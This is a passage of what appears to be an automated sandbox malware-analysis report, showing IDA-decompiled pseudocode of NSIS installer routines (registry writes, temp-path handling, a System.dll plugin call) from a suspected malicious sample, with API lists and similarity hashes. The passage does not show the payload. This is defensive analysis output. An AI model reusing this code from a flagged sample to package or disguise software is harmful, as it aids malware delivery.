                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                    • Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
                    • Opcode Fuzzy Hash: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                    • Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                    				void* _t20;
                    				void* _t21;
                    				int _t24;
                    				int _t30;
                    				intOrPtr _t33;
                    				void* _t34;
                    				intOrPtr _t37;
                    				void* _t39;
                    				void* _t42;
                    
                    				_t42 = __eflags;
                    				_t33 = __edx;
                    				_t30 = __ebx;
                    				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                    				_t34 = __eax;
                    				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                    				 *(_t39 - 0x44) = E00402DA6(2);
                    				_t20 = E00402DA6(0x11);
                    				 *(_t39 - 4) = 1;
                    				_t21 = E00402E36(_t42, _t34, _t20, 2);
                    				 *(_t39 + 8) = _t21;
                    				if(_t21 != __ebx) {
                    					_t24 = 0;
                    					if(_t37 == 1) {
                    						E00402DA6(0x23);
                    						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
                    					}
                    					if(_t37 == 4) {
                    						 *0x40b5c8 = E00402D84(3);
                    						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                    						_t24 = _t37;
                    					}
                    					if(_t37 == 3) {
                    						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
                    					}
                    					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
                    						 *(_t39 - 4) = _t30;
                    					}
                    					_push( *(_t39 + 8));
                    					RegCloseKey();
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
                    				return 0;
                    			}












                    0x0040248a
                    0x0040248a
                    0x0040248a
                    0x0040248a
                    0x0040248d
                    0x00402494
                    0x0040249e
                    0x004024a1
                    0x004024aa
                    0x004024b1
                    0x004024b8
                    0x004024bb
                    0x004024c1
                    0x004024cb
                    0x004024cf
                    0x004024da
                    0x004024da
                    0x004024e1
                    0x004024eb
                    0x004024f1
                    0x004024f4
                    0x004024f4
                    0x004024f8
                    0x00402504
                    0x00402504
                    0x0040251d
                    0x0040251f
                    0x0040251f
                    0x00402522
                    0x004025fd
                    0x004025fd
                    0x00402c2d
                    0x00402c39

                    APIs
                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024D5
                    • RegSetValueExW.ADVAPI32 ref: 00402515
                    • RegCloseKey.ADVAPI32(?), ref: 004025FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CloseValuelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
                    • API String ID: 2655323295-2005183556
                    • Opcode ID: a979bc7346380cecd7475a45158651290d955060ff6c70b6f24626f2f53e06a8
                    • Instruction ID: 3228b6dbd083cda5ecf055ca6763daeb969d91bf2f3b8010d8844d1cd476a235
                    • Opcode Fuzzy Hash: a979bc7346380cecd7475a45158651290d955060ff6c70b6f24626f2f53e06a8
                    • Instruction Fuzzy Hash: CF117C71E00118BEEB11AFA5DE49EAEBAB8FF44758F11443BF504B61C1D7B88D409A68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E00405EF1(void* __eflags, intOrPtr _a4) {
                    				int _t11;
                    				signed char* _t12;
                    				intOrPtr _t18;
                    				intOrPtr* _t21;
                    				signed int _t23;
                    
                    				E0040651A(0x7a4750, _a4);
                    				_t21 = E00405E94(0x7a4750);
                    				if(_t21 != 0) {
                    					E004067A1(_t21);
                    					if(( *0x7a8a78 & 0x00000080) == 0) {
                    						L5:
                    						_t23 = _t21 - 0x7a4750 >> 1;
                    						while(1) {
                    							_t11 = lstrlenW(0x7a4750);
                    							_push(0x7a4750);
                    							if(_t11 <= _t23) {
                    								break;
                    							}
                    							_t12 = E00406850();
                    							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                    								E00405E35(0x7a4750);
                    								continue;
                    							} else {
                    								goto L1;
                    							}
                    						}
                    						E00405DE9();
                    						return 0 | GetFileAttributesW(??) != 0xffffffff;
                    					}
                    					_t18 =  *_t21;
                    					if(_t18 == 0 || _t18 == 0x5c) {
                    						goto L1;
                    					} else {
                    						goto L5;
                    					}
                    				}
                    				L1:
                    				return 0;
                    			}








                    0x00405efd
                    0x00405f08
                    0x00405f0c
                    0x00405f13
                    0x00405f1f
                    0x00405f2f
                    0x00405f31
                    0x00405f49
                    0x00405f4a
                    0x00405f51
                    0x00405f52
                    0x00000000
                    0x00000000
                    0x00405f35
                    0x00405f3c
                    0x00405f44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f3c
                    0x00405f54
                    0x00000000
                    0x00405f68
                    0x00405f21
                    0x00405f27
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f27
                    0x00405f0e
                    0x00000000

                    APIs
                      • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                      • Part of subcall function 00405E94: CharNextW.USER32(?), ref: 00405EA2
                      • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                      • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
                    • API String ID: 3248276644-675090325
                    • Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                    • Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
                    • Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                    • Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405E94(WCHAR* _a4) {
                    				WCHAR* _t5;
                    				short* _t7;
                    				WCHAR* _t10;
                    				short _t11;
                    				WCHAR* _t12;
                    				void* _t14;
                    
                    				_t12 = _a4;
                    				_t10 = CharNextW(_t12);
                    				_t5 = CharNextW(_t10);
                    				_t11 =  *_t12;
                    				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                    					if(_t11 != 0x5c || _t12[1] != _t11) {
                    						L10:
                    						return 0;
                    					} else {
                    						_t14 = 2;
                    						while(1) {
                    							_t14 = _t14 - 1;
                    							_t7 = E00405E16(_t5, 0x5c);
                    							if( *_t7 == 0) {
                    								goto L10;
                    							}
                    							_t5 = _t7 + 2;
                    							if(_t14 != 0) {
                    								continue;
                    							}
                    							return _t5;
                    						}
                    						goto L10;
                    					}
                    				} else {
                    					return CharNextW(_t5);
                    				}
                    			}









                    0x00405e9d
                    0x00405ea4
                    0x00405ea7
                    0x00405ea9
                    0x00405eaf
                    0x00405ec7
                    0x00405ee9
                    0x00000000
                    0x00405ecf
                    0x00405ed1
                    0x00405ed2
                    0x00405ed5
                    0x00405ed6
                    0x00405edf
                    0x00000000
                    0x00000000
                    0x00405ee2
                    0x00405ee5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405ee5
                    0x00000000
                    0x00405ed2
                    0x00405ebe
                    0x00000000
                    0x00405ebf

                    APIs
                    Strings
                    • C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00405E95
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharNext
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
                    • API String ID: 3213498283-2005183556
                    • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                    • Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
                    • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                    • Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E00405DE9(WCHAR* _a4) {
                    				WCHAR* _t9;
                    
                    				_t9 = _a4;
                    				_push( &(_t9[lstrlenW(_t9)]));
                    				_push(_t9);
                    				if( *(CharPrevW()) != 0x5c) {
                    					lstrcatW(_t9, 0x40a014);
                    				}
                    				return _t9;
                    			}




                    0x00405dea
                    0x00405df7
                    0x00405df8
                    0x00405e03
                    0x00405e0b
                    0x00405e0b
                    0x00405e13

                    APIs
                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
                    • CharPrevW.USER32(?,00000000), ref: 00405DF9
                    • lstrcatW.KERNEL32 ref: 00405E0B
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-4017390910
                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E734F10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                    				void* _v0;
                    				void* _t27;
                    				signed int _t29;
                    				void* _t30;
                    				void* _t34;
                    				void* _t36;
                    				void* _t38;
                    				void* _t40;
                    				void* _t48;
                    				void* _t54;
                    				void* _t63;
                    				void* _t64;
                    				signed int _t66;
                    				void* _t67;
                    				void* _t73;
                    				void* _t74;
                    				void* _t77;
                    				void* _t80;
                    				void _t81;
                    				void _t82;
                    				intOrPtr _t84;
                    				void* _t86;
                    				void* _t88;
                    
                    				 *0x734f506c = _a8;
                    				 *0x734f5070 = _a16;
                    				 *0x734f5074 = _a12;
                    				_a12( *0x734f5048, E734F1651, _t73);
                    				_t66 =  *0x734f506c +  *0x734f506c * 4 << 3;
                    				_t27 = E734F12E3();
                    				_v0 = _t27;
                    				_t74 = _t27;
                    				if( *_t27 == 0) {
                    					L28:
                    					return GlobalFree(_t27);
                    				}
                    				do {
                    					_t29 =  *_t74 & 0x0000ffff;
                    					_t67 = 2;
                    					_t74 = _t74 + _t67;
                    					_t88 = _t29 - 0x66;
                    					if(_t88 > 0) {
                    						_t30 = _t29 - 0x6c;
                    						if(_t30 == 0) {
                    							L23:
                    							_t31 =  *0x734f5040;
                    							if( *0x734f5040 == 0) {
                    								goto L26;
                    							}
                    							E734F1603( *0x734f5074, _t31 + 4, _t66);
                    							_t34 =  *0x734f5040;
                    							_t86 = _t86 + 0xc;
                    							 *0x734f5040 =  *_t34;
                    							L25:
                    							GlobalFree(_t34);
                    							goto L26;
                    						}
                    						_t36 = _t30 - 4;
                    						if(_t36 == 0) {
                    							L13:
                    							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                    							_t74 = _t74 + _t67;
                    							_t34 = E734F1312(E734F135A(_t38));
                    							L14:
                    							goto L25;
                    						}
                    						_t40 = _t36 - _t67;
                    						if(_t40 == 0) {
                    							L11:
                    							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                    							_t74 = _t74 + _t67;
                    							_t34 = E734F1381(_t80, E734F12E3());
                    							goto L14;
                    						}
                    						L8:
                    						if(_t40 == 1) {
                    							_t81 = GlobalAlloc(0x40, _t66 + 4);
                    							_t10 = _t81 + 4; // 0x4
                    							E734F1603(_t10,  *0x734f5074, _t66);
                    							_t86 = _t86 + 0xc;
                    							 *_t81 =  *0x734f5040;
                    							 *0x734f5040 = _t81;
                    						}
                    						goto L26;
                    					}
                    					if(_t88 == 0) {
                    						_t48 =  *0x734f5070;
                    						_t77 =  *_t48;
                    						 *_t48 =  *_t77;
                    						_t49 = _v0;
                    						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                    						if( *((short*)(_t77 + 4)) == 0x2691) {
                    							E734F1603(_t49, _t77 + 8, 0x38);
                    							_t86 = _t86 + 0xc;
                    						}
                    						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                    						GlobalFree(_t77);
                    						goto L26;
                    					}
                    					_t54 = _t29 - 0x46;
                    					if(_t54 == 0) {
                    						_t82 = GlobalAlloc(0x40,  *0x734f506c +  *0x734f506c + 8);
                    						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                    						_t14 = _t82 + 8; // 0x8
                    						E734F1603(_t14, _v0, 0x38);
                    						_t86 = _t86 + 0xc;
                    						 *_t82 =  *( *0x734f5070);
                    						 *( *0x734f5070) = _t82;
                    						goto L26;
                    					}
                    					_t63 = _t54 - 6;
                    					if(_t63 == 0) {
                    						goto L23;
                    					}
                    					_t64 = _t63 - 4;
                    					if(_t64 == 0) {
                    						 *_t74 =  *_t74 + 0xa;
                    						goto L13;
                    					}
                    					_t40 = _t64 - _t67;
                    					if(_t40 == 0) {
                    						 *_t74 =  *_t74 + 0xa;
                    						goto L11;
                    					}
                    					goto L8;
                    					L26:
                    				} while ( *_t74 != 0);
                    				_t27 = _v0;
                    				goto L28;
                    			}


























                    0x734f10eb
                    0x734f1100
                    0x734f1109
                    0x734f110e
                    0x734f1119
                    0x734f111c
                    0x734f1125
                    0x734f1129
                    0x734f112b
                    0x734f12b0
                    0x734f12ba
                    0x734f12ba
                    0x734f1132
                    0x734f1132
                    0x734f1137
                    0x734f1138
                    0x734f113a
                    0x734f113d
                    0x734f1256
                    0x734f1259
                    0x734f1271
                    0x734f1271
                    0x734f1278
                    0x00000000
                    0x00000000
                    0x734f1285
                    0x734f128a
                    0x734f128f
                    0x734f1294
                    0x734f129a
                    0x734f129b
                    0x00000000
                    0x734f129b
                    0x734f125b
                    0x734f125e
                    0x734f11bc
                    0x734f11bf
                    0x734f11c2
                    0x734f11cb
                    0x734f11d0
                    0x00000000
                    0x734f11d1
                    0x734f1264
                    0x734f1266
                    0x734f11a2
                    0x734f11a5
                    0x734f11a8
                    0x734f11b1
                    0x00000000
                    0x734f11b1
                    0x734f1164
                    0x734f1165
                    0x734f1177
                    0x734f1180
                    0x734f1184
                    0x734f118e
                    0x734f1191
                    0x734f1193
                    0x734f1193
                    0x00000000
                    0x734f1165
                    0x734f1143
                    0x734f1218
                    0x734f121d
                    0x734f1221
                    0x734f1223
                    0x734f122c
                    0x734f122f
                    0x734f1238
                    0x734f123d
                    0x734f123d
                    0x734f1247
                    0x734f124a
                    0x00000000
                    0x734f1250
                    0x734f1149
                    0x734f114c
                    0x734f11e9
                    0x734f11ed
                    0x734f11f7
                    0x734f11fb
                    0x734f1205
                    0x734f120a
                    0x734f1211
                    0x00000000
                    0x734f1211
                    0x734f1152
                    0x734f1155
                    0x00000000
                    0x00000000
                    0x734f115b
                    0x734f115e
                    0x734f11b8
                    0x00000000
                    0x734f11b8
                    0x734f1160
                    0x734f1162
                    0x734f119e
                    0x00000000
                    0x734f119e
                    0x00000000
                    0x734f12a1
                    0x734f12a1
                    0x734f12ab
                    0x00000000

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 734F1171
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 734F11E3
                    • GlobalFree.KERNEL32 ref: 734F124A
                    • GlobalFree.KERNEL32(?), ref: 734F129B
                    • GlobalFree.KERNEL32(00000000), ref: 734F12B1
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$Free$Alloc
                    • String ID:
                    • API String ID: 1780285237-0
                    • Opcode ID: 7e00feaecf6a4ead55bf7f79202ba088aa16e3caec578b435fc7449cb293885c
                    • Instruction ID: 3ab0df95bbb567b403e9c173cf8a5ab9edbb08b8339baf1c54f5d1a4baf8521b
                    • Opcode Fuzzy Hash: 7e00feaecf6a4ead55bf7f79202ba088aa16e3caec578b435fc7449cb293885c
                    • Instruction Fuzzy Hash: 23515CB6900203DFE708EFA9D944B167BF8EB08315B1D415AE94AEB350E734DA11CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                    				signed int _t14;
                    				int _t17;
                    				void* _t24;
                    				intOrPtr* _t29;
                    				void* _t31;
                    				signed int _t32;
                    				void* _t35;
                    				void* _t40;
                    				signed int _t42;
                    
                    				_t29 = __edi;
                    				_t24 = __ebx;
                    				_t14 =  *(_t35 - 0x28);
                    				_t40 = __edx - 0x38;
                    				 *(_t35 - 0x10) = _t14;
                    				_t27 = 0 | _t40 == 0x00000000;
                    				_t32 = _t40 == 0;
                    				if(_t14 == __ebx) {
                    					if(__edx != 0x38) {
                    						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                    					} else {
                    						E00402DA6(0x21);
                    						E0040653C("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp", "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll", 0x400);
                    						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll");
                    					}
                    				} else {
                    					E00402D84(1);
                    					 *0x40adc8 = __ax;
                    					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                    				}
                    				 *(_t35 + 8) = _t17;
                    				if( *_t29 == _t24) {
                    					L13:
                    					 *((intOrPtr*)(_t35 - 4)) = 1;
                    				} else {
                    					_t31 = E0040647A(_t27, _t29);
                    					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060EB(_t31, _t31) >= 0) {
                    						_t14 = E004060BC(_t31, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *(_t35 + 8));
                    						_t42 = _t14;
                    						if(_t42 == 0) {
                    							goto L13;
                    						}
                    					} else {
                    						goto L13;
                    					}
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
                    				return 0;
                    			}












                    0x0040263e
                    0x0040263e
                    0x0040263e
                    0x00402643
                    0x00402646
                    0x00402649
                    0x0040264e
                    0x00402650
                    0x00402670
                    0x004026aa
                    0x00402672
                    0x00402674
                    0x00402688
                    0x00402695
                    0x00402695
                    0x00402652
                    0x00402654
                    0x00402659
                    0x00402667
                    0x0040266a
                    0x004026af
                    0x004026b2
                    0x0040292e
                    0x0040292e
                    0x004026b8
                    0x004026c1
                    0x004026c3
                    0x004026e2
                    0x004015b4
                    0x004015b6
                    0x00000000
                    0x004015bc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004026c3
                    0x00402c2d
                    0x00402c39

                    APIs
                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll), ref: 00402695
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
